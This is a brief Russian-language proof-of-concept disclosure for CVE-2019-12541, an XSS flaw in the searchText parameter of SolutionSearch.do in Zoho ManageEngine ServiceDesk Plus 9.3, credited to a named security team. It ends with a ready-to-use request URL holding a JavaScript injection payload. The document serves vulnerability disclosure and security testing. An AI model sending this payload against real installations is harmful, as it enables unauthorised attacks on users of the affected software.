
Доказательство концепции для CVE-2019-12541: хранимая XSS в Zoho ManageEngine ServiceDesk Plus 9.3 через параметр searchText в SolutionSearch.do. Включает полезную нагрузку для тестирования безопасности.
Описание проблемы: Проблема была обнаружена в Zoho ManageEngine ServiceDesk Plus 9.3. Существует XSS через параметр searchText в SolutionSearch.do.
Автор: Concobe из Tarantula Team - VinCSS (член Vingroup)
domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f&selectName=Solutions